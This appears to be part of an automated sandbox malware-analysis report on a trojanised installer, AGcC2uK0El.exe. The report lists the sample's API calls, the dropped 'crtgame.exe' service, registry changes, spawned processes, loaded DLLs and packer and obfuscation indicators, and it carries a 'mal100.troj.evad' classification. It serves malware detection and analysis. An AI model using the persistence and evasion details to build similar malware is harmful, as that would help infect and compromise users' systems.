                  Source: is-P33NB.tmp.1.dr Static PE information: section name:
                  Source: is-P33NB.tmp.1.dr Static PE information: section name:
                  Source: is-P33NB.tmp.1.dr Static PE information: section name:
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_0042F394 NtdllDefWindowProc_A
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_00423B94 NtdllDefWindowProc_A
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_004125E8 NtdllDefWindowProc_A
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_0045678C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_00477568 NtdllDefWindowProc_A
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_0042E7A8: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exe Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_00454B00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exe Code function: 0_2_0040840C
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_00466ABC
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_0047EFD8
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_0043D5A4
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_0046F68C
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_0048C110
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_004301D0
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_004442C4
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_0045E7EC
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_0045A894
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_004449BC
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_00468B44
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_00434B1C
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_00430D5C
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_00444DC8
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_00484ED4
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_0045101C
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_00443D1C
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_00485E08
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_00433E18
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_02471EE0
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_02471140
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_024716B0
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 5_2_00401051
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 5_2_00406CE7
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 5_2_00401CBD
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02C45F14
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02C4EA06
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02C648E9
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02C5E065
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02C62874
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02C59944
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02C45ED3
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02C5A6FA
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02C45E9B
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02C64E60
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02C5D759
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02C57F02
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02C5DC4D
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02C7B85F
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02C7B806
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02C7BE57
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02C7BE1D
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: String function: 02C64DF0 appears 137 times
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: String function: 02C585A0 appears 37 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: String function: 004458F8 appears 59 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: String function: 00405964 appears 110 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: String function: 00445628 appears 45 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: String function: 00408C14 appears 45 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: String function: 00406ACC appears 39 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: String function: 00403400 appears 61 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: String function: 00433D30 appears 32 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: String function: 004078FC appears 43 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: String function: 00457114 appears 70 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: String function: 00403494 appears 82 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: String function: 004529A4 appears 91 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: String function: 00403684 appears 218 times
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: String function: 00456F08 appears 91 times
                  Source: AGcC2uK0El.exe Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: AGcC2uK0El.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                  Source: AGcC2uK0El.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                  Source: AGcC2uK0El.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                  Source: AGcC2uK0El.tmp.0.dr Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                  Source: crtgame.exe.1.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                  Source: is-785C0.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                  Source: is-785C0.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                  Source: is-785C0.tmp.1.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                  Source: is-785C0.tmp.1.dr Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                  Source: SHelperTrack.exe.5.dr Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                  Source: is-PJQ9V.tmp.1.dr Static PE information: Number of sections : 11 > 10
                  Source: is-O51E5.tmp.1.dr Static PE information: Number of sections : 11 > 10
                  Source: is-6S6NV.tmp.1.dr Static PE information: Number of sections : 11 > 10
                  Source: is-D10RQ.tmp.1.dr Static PE information: Number of sections : 11 > 10
                  Source: is-8JJ67.tmp.1.dr Static PE information: Number of sections : 11 > 10
                  Source: is-5JD36.tmp.1.dr Static PE information: Number of sections : 11 > 10
                  Source: is-E5NVS.tmp.1.dr Static PE information: Number of sections : 18 > 10
                  Source: AGcC2uK0El.exe, 00000000.00000003.2054765577.0000000002380000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs AGcC2uK0El.exe
                  Source: AGcC2uK0El.exe, 00000000.00000003.2054950745.0000000002088000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs AGcC2uK0El.exe
                  Source: AGcC2uK0El.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: crtgame.exe.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: _RegDLL.tmp.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: SHelperTrack.exe.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: is-ULG4P.tmp.1.dr Static PE information: Section: ZLIB complexity 0.9964533211297071
                  Source: is-PJ8MN.tmp.1.dr Static PE information: Section: ZLIB complexity 0.9976058467741935
                  Source: is-JU8A8.tmp.1.dr Static PE information: Section: ZLIB complexity 0.995148689516129
                  Source: is-930UV.tmp.1.dr Static PE information: Section: ZLIB complexity 0.9908203125
                  Source: is-FBHNA.tmp.1.dr Static PE information: Section: ZLIB complexity 0.9903624487704918
                  Source: is-5QDBA.tmp.1.dr Static PE information: Section: ZLIB complexity 0.9891526442307692
                  Source: is-2V0OO.tmp.1.dr Binary or memory string: ?..la..dll.Unknown error %u occurred.sln
                  Source: classification engine Classification label: mal100.troj.evad.winEXE@15/128@7/3
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 7_2_02C502C0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exe Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_00454B00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_00455328 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 5_2_00402546 lstrcmpiW,GetModuleHandleA,GetModuleFileNameA,GetModuleHandleA,GetModuleFileNameW,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,CreateDirectoryA,CopyFileA,OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Code function: 1_2_0046D118 GetVersion,CoCreateInstance
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exe Code function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Code function: 5_2_004026EE GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,CreateThread,WaitForSingleObject,ExitProcess,StartServiceCtrlDispatcherA
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp File created: C:\Program Files (x86)\CRTGame
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_03
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe Mutant created: \Sessions\1\BaseNamedObjects\AnyMediaPlayer
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exe File created: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe File read: C:\Windows\System32\drivers\etc\hosts
                  Source: is-E5NVS.tmp.1.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: is-E5NVS.tmp.1.dr Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                  Source: is-E5NVS.tmp.1.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: is-E5NVS.tmp.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: is-E5NVS.tmp.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: is-E5NVS.tmp.1.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: is-E5NVS.tmp.1.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: is-E5NVS.tmp.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: is-E5NVS.tmp.1.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: AGcC2uK0El.exe Virustotal: Detection: 58%
                  Source: AGcC2uK0El.exe ReversingLabs: Detection: 55%
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exe File read: C:\Users\user\Desktop\AGcC2uK0El.exe
                  Source: unknown Process created: C:\Users\user\Desktop\AGcC2uK0El.exe "C:\Users\user\Desktop\AGcC2uK0El.exe"
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exe Process created: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp "C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp" /SL5="$10480,7025884,54272,C:\Users\user\Desktop\AGcC2uK0El.exe"
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Query
                  Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Process created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -i
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" helpmsg 10
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Process created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -s
                  Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\net.exe Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exe Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Section loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Section loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Section loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Section loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Section loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Section loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Section loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp Section loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: sfc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: version.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: version.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpWindow found: window name: TMainFormJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: AGcC2uK0El.exeStatic file information: File size 7280524 > 1048576
                  Source: Binary string: X:\delphi\xrecode3\src\c\DLL\visualc\libmp4v2\bin\Windows-Win32\Release\libmp4v2.pdb source: is-ODQUV.tmp.1.dr
                  Source: Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb source: is-GN0SC.tmp.1.dr

                  Data Obfuscation

Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Unpacked PE file: 5.2.crtgame.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.hsave:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Unpacked PE file: 5.2.crtgame.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp | Code function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress, 1_2_0044C030
Source: initial sample | Static PE information: section where entry point is pointing to: petite
Source: crtgame.exe.1.dr | Static PE information: section name: .hsave
Source: is-HLDR5.tmp.1.dr | Static PE information: section name: /4
Source: is-CHRTV.tmp.1.dr | Static PE information: section name: /4
Source: is-LP9D8.tmp.1.dr | Static PE information: section name: /4
Source: is-E5NVS.tmp.1.dr | Static PE information: section name: /4
Source: is-E5NVS.tmp.1.dr | Static PE information: section name: /19
Source: is-E5NVS.tmp.1.dr | Static PE information: section name: /31
Source: is-E5NVS.tmp.1.dr | Static PE information: section name: /45
Source: is-E5NVS.tmp.1.dr | Static PE information: section name: /57
Source: is-E5NVS.tmp.1.dr | Static PE information: section name: /70
Source: is-E5NVS.tmp.1.dr | Static PE information: section name: /81
Source: is-E5NVS.tmp.1.dr | Static PE information: section name: /92
Source: is-GN0SC.tmp.1.dr | Static PE information: section name: .trace
Source: is-GN0SC.tmp.1.dr | Static PE information: section name: _RDATA
Source: is-GN0SC.tmp.1.dr | Static PE information: section name: .debug_o
Source: is-RJL72.tmp.1.dr | Static PE information: section name: /4
Source: is-H6A9P.tmp.1.dr | Static PE information: section name: /4
Source: is-PJ2FQ.tmp.1.dr | Static PE information: section name: /4
Source: is-OSQAA.tmp.1.dr | Static PE information: section name: /4
Source: is-5JD36.tmp.1.dr | Static PE information: section name: /4
Source: is-O51E5.tmp.1.dr | Static PE information: section name: /4
Source: is-6S6NV.tmp.1.dr | Static PE information: section name: /4
Source: is-8JJ67.tmp.1.dr | Static PE information: section name: /4
Source: is-I5CC7.tmp.1.dr | Static PE information: section name: /4
Source: is-ULG4P.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-ULG4P.tmp.1.dr | Static PE information: section name: (nameless)
Source: is-ULG4P.tmp.1.dr | Static PE information: section name: petite
